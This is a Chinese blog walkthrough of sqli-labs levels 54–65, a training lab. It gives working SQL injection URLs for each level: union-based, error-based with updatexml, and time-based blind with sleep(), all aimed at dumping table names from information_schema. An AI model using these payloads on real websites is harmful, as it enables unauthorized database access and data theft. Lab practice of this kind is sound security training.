首页 > 其他 > 详细

Less54-Less65

时间:2020-02-09 13:47:53      阅读:91      评论:0      收藏:0      [点我收藏+]

Less-54:使用’’包裹

对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名

 技术分享图片

 

 技术分享图片

 

 

 

http://192.168.27.156/sqli-labs/Less-54/?id=1‘order by 4 --+   存在三列

 技术分享图片

 

 

http://192.168.27.156/sqli-labs/Less-54/?id=-1‘union select 1,2,3 --+   找到回显位置

 技术分享图片

 

 

http://192.168.27.156/sqli-labs/Less-54/?id=-1‘union select 1,2, group_concat(table_name)from information_schema.tables where table_schema=‘CHALLENGES‘ --+

技术分享图片

 

 

 

下面按照第一关那样就可以

 

Less55: 使用()包裹   对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他与第54关一致

 技术分享图片

 

 技术分享图片

 

 

 

 

 

Less56:使用(‘’)包裹  其他与第54关一致

 技术分享图片

 

 

 

Less57:使用””包裹  其他与第54关一致

 

 技术分享图片

 

 

Less58:使用’’包裹   5次机会

 技术分享图片

 

 

http://192.168.27.156/sqli-labs/Less-58/?id=-1‘ union select 1,2,3 --+   但是在下图并没有显示回显的位置

技术分享图片

 

 

 

所以我们使用报错注入

http://192.168.27.156/sqli-labs/Less-58/?id=-1‘andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=‘CHALLENGES‘)),1) --+

 

得到表ast230gxyj

技术分享图片

 

 

其他与第1关是一样的

Less59:无包裹使用报错注入方法与第58关一致

 技术分享图片

 

 

 

 

Less60:使用(“”)包裹  采用报错注入与前面一致

 

 技术分享图片

 

 

Less61:使用((‘’))包裹采用报错注入方法与前面一致

 技术分享图片

 

 

Less62:使用((‘’))包裹 130  方法与前面一致

使用时间盲注

 技术分享图片

 

 

http://192.168.27.156/sqli-labs/Less-62/?id=1‘) and if((length(database())=1),1,sleep(5))--+

判断数据库的长度

 技术分享图片

 

 

http://192.168.27.156/sqli-labs/Less-62/?id=1‘) and if( left( (select table_name from information_schema.tables where

table_schema=‘CHALLENGES‘ limit 0,1),1)> ‘d‘ ,1, sleep(5)) --+

判断表的第一位字母是不是比d大

 技术分享图片

 

 

Less63:使用‘’包裹 130  方法与第62关一致

使用时间盲注

 技术分享图片

 

 

Less64:使用(())包裹 130  方法与第62关一致

 技术分享图片

 

 

Less65:使用(“”)包裹 130  方法与第62关一致

 技术分享图片

 

Less54-Less65

原文:https://www.cnblogs.com/7-58/p/12286709.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!